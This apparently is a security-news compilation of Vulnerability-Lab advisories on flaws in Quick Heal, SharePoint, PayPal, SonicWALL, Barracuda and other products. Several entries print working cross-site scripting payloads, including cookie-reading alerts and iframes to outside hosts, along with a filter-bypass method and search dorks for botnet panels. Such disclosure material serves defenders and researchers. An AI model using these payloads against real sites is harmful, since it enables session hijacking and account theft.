Local Stack buffer overflow Vulnerability in Quickheal antivirus

A Security researcher from Vulnerability Lab has discovered a local stack buffer overflow vulnerability in the QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software.
 
Researcher says improper handling of buffers in the 'pepoly.dll' module on certain conditions leads to a stack overflow.  Disabling the Core scanning server service could trigger the vulnerable point and crash the system.

"The vulnerability is located in the generated PE file `*.text` value. It can be overflowed by manipulating import of a malicious PE file.The issue is a classic (uni-code) stack buffer overflow"


A local attacker with low privilege can exploit this vulnerability to take control of the system or simply crash the quickheal software system process.  The security risk of this vulnerability has been estimated as medium.

Researcher also provided a solution to fix the vulnerability: "It can be patched by a secure filter and size restriction of the PE file name text flag".

The proof of concept is available here.

Microsoft SharePoint vulnerable to Exception Handling Web Vulnerability

The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official Microsoft Sharepoint Online (cloud-based) application.

The vulnerability allows remote attackers to inject own malicious script code to a vulnerable module on application-side (persistent).

The vulnerability is located in the `Sharepoint Online Cloud 2013 Service` section when processing to request the `Berechtigungen für
den Metadatenspeicher festlegen` module with manipulated ms-descriptionText > ctl00_PlaceHolderDialogBodySection_
PlaceHolderDialogBodyMainSection_ValSummary parameters. The persistent injected script code execution occurs in the main
`invalid BDC Übereinstimmung` web application exception-handling

The vulnerability can be exploited with a low (restricted) privileged application user account and low or medium required user interaction.
Successful exploitation of the vulnerability result in persistent session hijacking, persistent phishing, stable external redirect, stable
external malware loads and persistent vulnerable module context manipulation.

The vulnerability is fixed .

Multiple software vulnerabilities in Trend Micro DirectPass 1.5.0.1060


The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software.

Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to remember one password. Other features include: Keystroke encryption, secure password generation, automatic form-filling, confidential notes, and a secure browser.

The first vulnerability is a local command injection vulnerability that allows local low privileged system user accounts to inject system specific commands or local path requests to compromise the software.

The second security flaw discovered by the vulnerability-lab is a persistent input validation vulnerability that allows local attackers with low privileged system user account to implement/inject malicious script code on application side (persistent) of the software.

The third one is a critical pointer vulnerability (DoS) that allows local attackers with low privileged system user account to crash the software via pointer vulnerability.

While the Local path injection vulnerability has been marked as high risk bug, other vulnerabilities has been marked as medium risk bug.

After receiving notification from Vulnerability-lab researchers, Trend micro fixed the vulnerability on 2013-05-15.

The Technical details and proof-of-concept can be found here.

Multiple vulnerabilities in Enterpriser16 LoadBalancer v7.1


Vulnerability-Lab researchers have found multiple persistent input validation web vulnerabilities in the  Enterpriser16 v7.1 Load Balancer Application.

The first vulnerabilities are located in the `Edit Configuration` module with the bound vulnerable Label, Virtual Host, Request to send, Email Alerts and Response expected parameters.

The secound vulnerabilities are located in the Create Solution, Access points and New Contract module with the bound vulnerable title, asset name, contract name, name or description parameter requests.

Exploitation requires low user interaction and a low privileged application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing or persistent module web context manipulation.

A detailed proof-of-concept can be found here.

Reflected XSS in Vulnerability-Lab site(vulnerability-lab.com)


The Inj3ct0r team has found Reflected Cross Site scripting(XSS) vulnerability in the official website of Vulnerability-Lab.

The subdomain of Vulnerability Lab (video.vulnerability-lab.com/) that host video demo of exploits, has been found to be vulnerable to the non-persistent XSS security flaw.


vulnerability lab xss


The inj3ct0r team provided us the POC for the vulnerability :
173.0.61.44/video/?s="><script>alert("Inj3ct0r Team found Xss on vulnerability-lab")</script>&x=7&y=8
The above code will display a popup with the text "Inj3ct0r Team found Xss on vulnerability-lab".  At first the URL confused me, it points to some other IP.

 But I visit "video.vulnerability-lab.com" website and verified the security flaw by entering the script .  It seems like the result is being loaded from the above mentioned IP address.


"We know already about the issue 3 week ago."The vulnerability Lab team has responded. "The issue is not exploitable ... its fake because the issue is located in the website were no login is in use even if it is wordpress."

"The module and the video blog itself was secured ... only the update made the vulnerable module back available."

Persistent Cross Site Scripting Vulnerability in the official Paypal ecommerce


The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Paypal ecommerce website content management system.

The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Artikel pro Seite listing module with the bound vulnerable filterVal1 parameter.

Remote exploitation requires low user inter action or privileged application user account for local exploitation. Successful exploitation of the vulnerability can lead to session hijacking (admin), account steal via persistent web attack or stable (persistent) context manipulation.


Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers & local privileged user accounts with low required user inter action.
For demonstration or reproduce ...

Review: [ALL Listing] (index) Rechnungen Verwalten -  Geld Anfordern > Artikel pro Seite (Listing) > filterVal1

var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = "zwischen";
var txt2 = " und ";
var txtLabel = "Wert 2";
var advFilter = "email";
var dateFilter = "invoice_date";
var filterVal1 = "<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.cookie=true</script>"> <script>document.cookie=true;</script>


PoC:  "><iframe src=http://vuln-lab.com onload=alert("VulnerabilityLab") <

The security risk of the persistent script code inject vulnerability is estimated as medium(+).The vulnerability successfully fixed by Paypal.

A persistent input validation Vulnerability in the official Paypal Plaza


The Vulnerability Laboratory Research Team discovered a persistent input validation Vulnerability in the official Paypal Plaza website application.

The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the paypal plaza egreetings web service. The vulnerability is located in the (Step 5 Preview) eGreeting module notification with the bound vulnerable your name and recipient’s name parameters.

The vulnerability can be exploited by remote attackers with low or medium required user interaction and without privileged Customer/Pro/Seller account. Successful exploitation of the vulnerability can lead to session hijacking (customers),account steal via persistent web attacks, persistent phishing or stable (persistent) mail notification context manipulation.

Proof of Concept:
=================

The persistent input validation vulnerability can be exploited by remote attackers with low or medium required user inter action.
For demonstration or reproduce ...

Review:  Notification Mail - eGreetings Card Notification

<html>
<head>
<title>You have received a eCard from your loved one.</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>
You have received a eCard from your loved one.</td></tr><tr><td><b>Von: </b>=?utf-8?B?Ij48aWZyYW1lIHNyYz1hIG9ubG9hZD1hbGVydCgiSEkiKSA8?=
 <admin@vulnerability-lab.com></td></tr><tr><td><b>Datum: </b>14.08.2012 05:15</td></tr></table><table border=0 cellspacing=0
cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>research@vulnerability-lab.com</td></tr></table><br>
Dear "><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") <,<br/><br/>
Greetings! "><"><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") < has just sent you a eCard.
<br/><br/>
<a href="https://www.paypal-plaza.com/giftcard/2494/lang/en_au">View your eCard now.</a>
</body>
</html>

The security risk of the persistent input validation vulnerability in the mail notification service filter is estimated as medium. The vulnerability has been fixed by Paypal now.

Researcher break into Trojan Application Backdoor.Win32.VB.oyu

The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the vOlk-Botnet framework application v4.0 private edition.

vOlk-Botnet v4.0 is a remote administration tool, its main function is to manage the HOSTS file of the windows operating systems The code created by [byvOlk] PHP and Visual Basic 6.0.

Vulnerability Details:
1.1
The vulnerability laboratory research team discovered multiple sql injection vulnerabilities in the vOlk-Botnet framework application v4.0 private edition.
The sql vulnerabilities allow remote attackers to inject/execute own sql commands/statements on the affected vOlks botnet application control panel dbms.

The vulnerabilities are located in the Messenger, Filezilla, Estadisticas files with the bound vulnerable ?pag listing parameter. The vulnerability can
be exploited by remote attackers without required user inter action. Successful exploitation of the vulnerabilities result in botnet control panel
compromise via remote sql injection attack.

Vulnerable Files(s):
[+] Messenger.php
[+] Filezilla.php
[+] Estadisticas.php

Vulnerable Parameter(s):
[+] pag


1.2
The vulnerability laboratory research team discovered multiple persistent web vulnerabilities in the vOlk-Botnet framework application v4.0 private edition.
The input validation vulnerabilities allow remote attackers to inject own malicious persistent script code on application side of the botnet framework.
The vulnerabilities are located in the Visit Webpage (Open URL), MSN Stealer, Download File and Setting modules with the bound vulnerable domin,
Pasw, https or messenger bot s name parameters. The vulnerability can be exploited by remote attacker with low or medium required user inter action.
Successful exploitation of the vulnerabilities result in botnet control panel compromise via session hijacking, persistent web context manipulation or
combined csrf request manipulation.

Vulnerable Module(s):
[+] MSN Stealer
[+] Visit Webpage (Open URL)
[+] Download File
[+] Setting

Vulnerable Parameter(s):
[+] Name - Bot s Name
[+] URL - Open URL Bots
[+] URL - Download url
[+] Password Administrator & User Administrator


Dork CodeSearch:  <p><font color=``#FFFFFF`` face=``Tahoma`` size=``1``>vOlk-Botnet 4.0</font></p>``   or ``<title>[vOlk-Botnet]v 4.0 Login</title>``
DorK Google:      allinurl:vOlk-Botnet 4.0    or  subtitle:[byvOlk] - WebAdmin Panel ® vOlk-Botnet 4.0    and  allinurl:WebAdmin/archivos/imagen/logo.jpg

Vulnerability-Lab discovered persistent input validation vulnerability in paypal

paypal vulnerability

A Security Researcher from Vulnerability-Lab has discovered a persistent input validation vulnerability in the official Paypal ecommerce website content management system (Customer/Pro/Seller). The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent) of the paypal web service.

The vulnerability is located in the company profile input fields with the bound vulnerable address_id, details (mail) & companyname parameters.

The bug affects the important user profile listing, the address listings & security notification (mail). The persistent vulnerability is also located in the mail security notification (delete address) module with the bound vulnerable companyname parameters.

 The vulnerability can be exploited by remote attackers with low required user inter action and privileged Customer/Pro/Seller account. Successful exploitation of the vulnerability can lead to session hijacking (customers), account steal via persistent web attack, persistent phishing or stable (persistent) context manipulation in all sections/module were the vulnerable companyname  get displayed.

"Restrict the company name input value and parse with an exception handling or secure filter mask. Parse the companyname, addressid &  details output of the security mail notification to prevent script code injects/executions." Vulnerability-Lab suggest as solution for this vulnerability.

Few months after Vulnerability-Lab discovered security flaw and notified paypal, Paypal's security team has fixed the bug.

The POC details for this vulnerability can be found here.

Researcher discovered multiple vulnerabilities in Manage Engine OpStor


The vulnerability researcher Ibrahim El-Sayed (Mossad) discovered multiple different software vulnerabilities in Manage Engines OpStor Manager.

OpStor is a multi-vendor storage area networks SAN and network attached storage NAS monitoring tool for storage devices like Storage Arrays, Fabric Switches, Tape Libraries, Host servers and Host Bus Adapters cards from leading vendors like EMC, HP, IBM, Promise, Fibrenetix, Cisco, Brocade, DELL, ADIC, SUN, QLogic, Emulex, JNI and co.

Ibrahim discovered 3 type of vulnerabilities in his report. A blind SQL Injection vulnerability, a persistent script code inject bug and multiple client side cross site scripting vulnerabilities.

The first vulnerability allows an attacker (remote) or local low privileged user account to execute a SQL commands on the affected application dbms. The vulnerability is located in raidMaps.do file with the bound vulnerable name parameter. Successful exploitation of the vulnerability result in dbms and application compromise.
Exploitation requires no user inter action and without privileged user account.

The secound allow remote attackers to implement/inject malicious script code on the application side (persistent).The persistent vulnerability is located in Alarm reporting module with the bound vulnerable subject parameters.Successful exploitation of the vulnerability result in session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action and privileged user account.

The third vulnerability allows remote attackers to hijack (client side) website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The vulnerabilities are located in availability730.do with the bound vulnerable day and name parameters. Successful exploitation can result in account steal, client site phishing and client-side content request manipulation.

Advisory:
http://www.vulnerability-lab.com/get_content.php?id=667

Multiple Vulnerabilities found in SonicWALL EMail Security 7.3.5

Vulnerability Laboratory Research Team has discovered multiple Web Vulnerabilities in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.

While most businesses now have some type of anti-spam protection, many must deal with cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership. SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven and patented technology designed to block spam and other threats effectively, easily and economically. With innovative protection techniques for both inbound and outbound email plus unique management tools, the Email Security platform delivers superior email protection today—while standing ready to stop the new attacks of tomorrow.

SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization, ease migration and reduce capital costs.


Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious persistent script code on application side of the email security appliance application.

The vulnerabilities are located on the Compliance & Virus
protection procedures module when processing to load unsanitized inputs as output listing of a configuration. Vulnerable values are floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser,zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation of the vulnerability result in session hijacking,persistent phishing requests & stable persistent module context manipulation.


Vulnerable Module(s):
                                [+] Virenschutzverfahren
                                [-] Ausgehend (Outgoing) - Listing & Exceptions

                                [+] Compliance Module
                                [-] Approval Ordner > Add new Approval Folder


1.2
Multiple client side cross site scripting vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker to manipulate client side appliance requests with medium required user inter action.
Successful exploitation results in sessio hijacking, account steal, client side phishing requests or manipulated context
exection on client side requests. The vulnerabilities are located on the `from`- & `row` page listing values. Successful exploitation
of the vulnerability result in client side session hijacking, non-persistent phishing requests & non-persistent module context manipulation.


Vulnerable Module(s):
                                [+] Listing Page (?from & ?row)


Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged user accounts.
For demonstration or reproduce ...

PoC: Ausgehend (Outgoing) - Listing & Exceptions

<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold" value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT PERSISTENT CODE!]' <"="">
    <input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>

... or

<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">


... or

amp;lt;input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">


... or

<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">

... or

<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">


URL:    http://esserver.127.0.0.1:8080/virus_config.html




PoC: Compliance Module  -> Approval Ordner - Listing & Exceptions

<tbody><tr><td background="policy_approval_box_summary-Dateien/nav_bar_background.gif" width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15" width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span class="column">Approval-
Ordner</span></td><td border="0" background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
 align="right"><input type="button" name="delete" class="button"
value="Löschen"


URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html



1.2
The client side cross site scripting vulnerability can be exploited by remote attackers with medium required user inter action.
For demonstration or reproduce ...

PoC:

http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c


Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities are estimated as high(-).

1.2
The security risk of the client side cross site scripting vulnerabilities are estimated as low(+).

UPDATE:Patch
"Dell SonicWALL E-mail security customers: 7.3.6 patch is now available https://www.mysonicwall.com/Firmware/DownloadCenter.aspx"


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

PoC Video:



Multiple Web Vulnerabilities found in Barracuda EMail Security 2.0.2

Vulnerability-Lab has discovered A filter bypass vulnerability & 2 persistent input validation vulnerabilities in Barracudas EMail Security Application UI v2.0.2.

The vulnerability allows an attacker (remote) to bypass the input validation & exception handling to inject or display own malicious persistent context on application side (persistent).

The vulnerabilities are located in the Domain Settings > Directory Services > LDAP Host module with the vulnerable bound name parameter. The secound persistent vulnerability is located in the reports module with the bound vulnerable parameters start date & end date.

 Exploitation requires low user inter action & privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin) or stable (persistent) context manipulation.

Vulnerability-Lab provide us the proof-of-concept for the two vulnerabilities.  Here it is:

POC for First Vulnerability:

Review: Domain Settings > Directory Services > LDAP Host

<div id="directory-services" class="module">
<h4 class="module-title">Directory Services</h4>
<div class="module-content">
<div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="http://global-evolution.info">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
<div style="float: right;">
<a href="https://ess.barracudanetworks.com/domains/sync_ldap/4&quot; class="btn"><span><span>Synchronize Now</span></span></a>
<a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
</div>
<p class="field">
<label class="label" for="ldap_host">LDAP Host:</label>
<input name="ldap_host" id="ldap_host" size="30" value=">
"<iframe src=http://global-evolution.info>@gmail.com >"<script>alert(document.cookie)</script><
div style="1@gmail.com 0" type="text">

URL: https://ess.127.0.0.1:1338/domains/info/4

PoC: >">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"

Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (>") will be bypassed and the string will be executed out of the secure exception handling message.

POC for second vulnerability :
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...

Vulnerable Module: Reports > Date Start > Date End

PoC: >"<iframe src=http://global-evolution.info&gt;

URL: https://ess.127.0.0.1:1338/reports

Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.

2012-06-20: Researcher Notification & Coordination
2012-06-23: Vendor Notification
2012-07-01: Vendor Response/Feedback
2012-07-24: Vendor Fix/Patch
2012-08-01: Public or Non-Public Disclosure

Researcher estimate the vulnerability risk level as medium . Vulnerability-Lab informed about the vulnerability to official vendor, They successfully patched the vulnerability and released BESS version 2.04.